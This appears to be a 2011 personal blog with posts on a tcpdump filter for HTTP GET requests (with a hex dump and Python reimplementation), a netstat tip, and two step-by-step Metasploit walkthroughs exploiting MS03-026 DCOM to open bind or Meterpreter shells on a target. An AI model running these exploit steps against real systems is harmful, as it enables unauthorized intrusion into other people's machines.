Tuesday, July 26, 2011

Can you find out how to make a capture filter that will only capture HTTP GET requests to a specific IP?

Answer: capture HTTP GET requests. This looks for the bytes 'G', 'E', 'T' and ' ' (hex values 47, 45, 54 and 20) just after the TCP header. "(tcp[12:1] & 0xf0) >> 2" works out the TCP header length. From Jefferson Ogata via the tcpdump-workers mailing list.


      port 80 and tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420


tcp[12:1] means: in the TCP header, go to byte offset 12 (zero-based, so the 13th byte) and read 1 byte.

0000  52 54 00 12 35 02 08 00  27 8b ba eb 08 00 45 00   RT..5... '.....E.
0010  02 9f f4 a7 40 00 40 06  00 d1 0a 00 02 0f 4a 7d   ....@.@. ......J}
0020  ec 54 87 88 00 50 5f 77  33 ac 54 e2 78 02 50 18   .T...P_w 3.T.x.P.
0030  16 d0 45 72 00 00 47 45  54 20 2f 20 48 54 54 50   ..Er..GE T / HTTP
0040  2f 31 2e 31 0d 0a 48 6f  73 74 3a 20 77 77 77 2e   /1.1..Ho st: www.
0050  67 6f 6f 67 6c 65 2e 63  6f 2e 69 6e 0d 0a 55 73   google.c o.in..Us
0060  65 72 2d 41 67 65 6e 74  3a 20 4d 6f 7a 69 6c 6c   er-Agent : Mozill
0070  61 2f 35 2e 30 20 28 58  31 31 3b 20 55 3b 20 4c   a/5.0 (X 11; U; L
0080  69 6e 75 78 20 69 36 38  36 3b 20 65 6e 2d 55 53   inux i68 6; en-US
0090  3b 20 72 76 3a 31 2e 39  2e 30 2e 31 35 29 20 47   ; rv:1.9 .0.15) G
00a0  65 63 6b 6f 2f 32 30 30  39 31 30 32 38 31 34 20   ecko/200 9102814

The TCP header is the part shown in bold in the original (Wireshark highlights it automatically when you select the TCP header in the packet details); in this dump it begins right after the 14-byte Ethernet header and the 20-byte IP header, at offset 0x22.

So from the dump above, tcp[12:1] = 0x50.

0x50 & 0xf0 = 0101 0000 & 1111 0000 (masking) = 0101 0000 = 0x50

0101 0000
1111 0000
-----------------
0101 0000

Now shift right by 2 using the right-shift operator (>> 2):
0101 0000 >> 2 = 0001 0100 = 0x14 = 20

Now,
tcp[20:4] = 47 45 54 20 (in hex, which is "GET " including the trailing space), so the filter matches this packet.
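Added example (not from the post or from tcpdump): the same filter arithmetic carried out in Python over the frame from the hex dump above, plus a constructed second frame whose TCP header carries options, to show why the header length is computed instead of hard-coding tcp[20:4]. The `dst_ip` argument is an assumption standing in for the `dst host` clause the question asks about but the post's filter does not include.

```python
import struct

# Frame rebuilt from the hex dump in the post: Ethernet, IPv4 and TCP headers
# followed by the start of "GET / HTTP/1.1\r\nHost: www." (rest not needed).
FRAME_FROM_POST = bytes.fromhex(
    "52 54 00 12 35 02 08 00 27 8b ba eb 08 00 45 00"
    "02 9f f4 a7 40 00 40 06 00 d1 0a 00 02 0f 4a 7d"
    "ec 54 87 88 00 50 5f 77 33 ac 54 e2 78 02 50 18"
    "16 d0 45 72 00 00 47 45 54 20 2f 20 48 54 54 50"
    "2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 77 77 77 2e"
)

def tcp_start(frame):
    """Offset of the TCP header; BPF's tcp[n] is relative to this point (found via the IP IHL)."""
    if frame[12:14] != b"\x08\x00" or frame[23] != 6:
        raise ValueError("not an IPv4/TCP frame")
    return 14 + (frame[14] & 0x0F) * 4

def tcp_data_offset(tcp):
    """(tcp[12:1] & 0xf0) >> 2: high nibble of byte 12 is the header length in 32-bit words."""
    return (tcp[12] & 0xF0) >> 2

def matches_get_filter(frame, dst_ip=None):
    """Python rendering of: port 80 and tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420."""
    if dst_ip is not None and ".".join(map(str, frame[30:34])) != dst_ip:
        return False  # assumed 'dst host' clause; IPv4 destination sits at IP offset 16
    tcp = frame[tcp_start(frame):]
    sport, dport = struct.unpack("!HH", tcp[:4])
    if 80 not in (sport, dport):
        return False
    off = tcp_data_offset(tcp)
    return tcp[off:off + 4] == b"GET "  # 0x47 0x45 0x54 0x20

def matches_fixed_offset(frame):
    """What a hard-coded tcp[20:4] does: right only when the TCP header has no options."""
    tcp = frame[tcp_start(frame):]
    return tcp[20:24] == b"GET "

def frame_with_tcp_options():
    """Constructed variant: same GET, but 12 bytes of TCP options (NOP, NOP, timestamp),
    so the data offset becomes 8 (32 bytes). IP length/checksums are not recomputed."""
    t = tcp_start(FRAME_FROM_POST)
    tcp = bytearray(FRAME_FROM_POST[t:])
    tcp[12] = (8 << 4) | (tcp[12] & 0x0F)
    options = b"\x01\x01\x08\x0a" + b"\x00" * 8  # constructed timestamp values
    return FRAME_FROM_POST[:t] + bytes(tcp[:20]) + options + bytes(tcp[20:])

if __name__ == "__main__":
    opt = frame_with_tcp_options()
    print(matches_get_filter(FRAME_FROM_POST), matches_get_filter(opt), matches_fixed_offset(opt))
```

Running it prints `True True False`: the computed-offset filter catches both frames, while the fixed tcp[20:4] check misses the request once TCP options (timestamps, SACK) push the payload further in.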

Monday, June 20, 2011

Most Common Vulnerability in Windows 2003 (MS03-026)

The most common vulnerability in Windows 2003 is MS03-026, and most of the time you can exploit it by following the steps below:
1. Open a shell and type "msfconsole".
2. search "ms03-026".
3. Copy the exact module line shown and then type use followed by it (paste with Shift+Insert).
4. show options.
5. set rhost "IP address of the target system".
6. show payloads.
7. set payload windows/shell_bind_tcp.
8. exploit.

Sunday, June 12, 2011

In Windows, finding out which service is running on which port

Hi,
In Windows, if you want to find out which service is running on which port, for example which port the httpd server is listening on, follow these steps:

1. Open cmd as administrator (right-click the cmd icon and choose "Run as administrator"); otherwise you will get the error "Elevation is required" when running the command.

2. Type netstat -anb and press Enter. Bingo, you get all the details.

Monday, May 30, 2011

hi hi hi :D ;) :)

First Hack Through Meterpreter

Dear Friends,
Today I am going to share my hacking through Meterpreter on Windows 2003/2000 and WinXP SP1 and SP2 (don't know about SP3).

Prerequisites: 1. BackTrack
2. MSFramework 3 (should be updated)
3. Music to listen to :)

In this tutorial I am going to use a Windows 2003 server as the victim and BackTrack as the attacker; at the end of the tutorial we will get a shell on the victim OS.

1. Open the shell, type msfconsole and press Enter.
2. Now enter: search dcom (dcom is the exploit name; generally you get the exploit name from a Nessus scan, or you can see all exploits by entering show exploits).
3. You will get a list of results.
4. Now enter use exploit/windows/dcerpc/ms03_026_dcom
5. show options
6. set rhost 192.168.4.xxx
7. show payloads and set your favourite payload; mine is set payload windows/meterpreter/bind_tcp
8. exploit

Voila, now you have a shell on the victim computer.